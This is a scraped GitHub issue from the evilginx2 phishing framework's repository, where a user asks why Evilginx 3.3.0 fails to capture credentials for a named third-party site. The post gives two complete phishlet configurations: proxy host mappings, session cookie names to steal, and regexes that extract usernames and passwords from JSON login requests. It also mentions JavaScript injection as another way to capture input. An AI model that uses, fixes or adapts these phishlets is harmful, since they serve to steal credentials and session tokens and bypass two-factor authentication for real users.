Giters

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Evilginx ver 3.3.0 cannot capture credentials

alasalamont opened this issue · comments

commented

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all,
I am using Evilginx 3.3.0 and testing for this domain 1byte.com. But cannot catch the credentials

  • Here is the POST request. The site use json format therefore the type at credentials must be json
    image

  • Here is the cookies stored on browser. The needed-cookies are auth._token_expiration.local and auth._token.local
    image

  • I did try test regular expression for catching the value of username + password. It works
    image

  • And here is my 1st phishlet, did not work :(

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['auth.token_expiration.local:always', 'auth._token.local:always']
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'
  • For the second phishlet, I specified all the domains correctly, but I encountered an issue with setting the value of auth_urls. The landing page is 1byte.com, but after logging in, the user dashboard uses bo.1byte.com and the content is retrieved from api.1byte.com. Since I set 1byte.com as the landing page in the proxy host, there's no way to instruct Evilginx to check api.1byte.com using the auth_urls after the login.
min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!

commented

I am trying to reproduce your issue but how did you manage to get evilginx and burp suite work together?
I get Cannot read TLS response from mitm'd server proxyconnect tcp: EOF